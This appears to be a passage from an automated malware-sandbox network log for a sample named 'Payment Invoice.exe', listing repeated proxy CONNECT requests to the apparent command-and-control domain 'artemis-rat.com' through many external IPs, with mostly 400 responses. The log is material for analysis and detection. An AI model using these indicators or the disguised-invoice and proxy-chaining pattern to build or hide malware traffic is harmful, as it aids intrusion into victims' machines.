                                                                Mar 11, 2024 16:15:15.670878887 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 54 41 31 32 06 71 b3 a4 66 f0 45 21 fb 3a ea 4c fd d3 62 63 c6 ac 51 56 67 67 66 8f 2c d4 ce 4c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 25 df e3 b3 44 90 7e 74 e9 79 e3 d1 03 fa 18 9c 29 2f 6f 1e c3
                                                                Data Ascii: %! TA12qfE!:LbcQVggf,L(%D~ty)/oKb>M
                                                                Mar 11, 2024 16:15:15.973437071 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 7c 89 4b ae 75 bc a8 ef 51 2b 78 cc b4 83 e0 58 3f fd 28 23 13 d6 49 a9 62 dc f7 3f 83 8d 18 69 2f 88 2d 8b aa 0e 46 d6
                                                                Data Ascii: (|KuQ+xX?(#Ib?i/-F


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                221192.168.2.450709172.67.181.97807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.058974028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.213359118 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                222192.168.2.450717104.25.42.178807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.058974981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.213247061 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                223192.168.2.450725104.19.225.70807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.059236050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.213416100 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                224192.168.2.450567184.181.217.20641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.059237957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                225192.168.2.4504851.15.62.1256787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.059349060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                226192.168.2.45060754.178.159.199180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.063090086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.324249029 CET503INHTTP/1.1 400 Bad Request
                                                                Content-Type: text/html; charset=us-ascii
                                                                Server: Microsoft-HTTPAPI/2.0
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Connection: close
                                                                Content-Length: 324
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                227192.168.2.45054451.15.242.20288887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.066879988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.359666109 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.21.6
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                228192.168.2.450614174.64.199.7941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.078926086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                229192.168.2.45051295.66.138.2188807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.084584951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                230192.168.2.450762172.67.127.188807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.084769011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.239187002 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                231192.168.2.450580198.44.255.3807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.087243080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.384907961 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.24.0
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                232192.168.2.450771172.67.182.107807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.089776039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.244375944 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                233192.168.2.450751104.22.50.220807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.091197014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.245513916 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                234192.168.2.450651184.178.172.5153037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.093833923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                235192.168.2.450559152.32.132.220807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.094990969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.761010885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.682970047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.621428967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.324098110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.994268894 CET325INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.1
                                                                Date: Mon, 11 Mar 2024 15:19:54 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                236192.168.2.4505755.252.23.22010817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.105901957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                237192.168.2.45073191.134.140.160272077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.105938911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                238192.168.2.449802131.100.48.759997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.112010002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.665776968 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                239192.168.2.450821104.27.26.29807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.112257004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.266690969 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                240192.168.2.450823172.67.181.12807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.128526926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.283065081 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                241192.168.2.450829104.27.37.131807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.128526926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.282886982 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
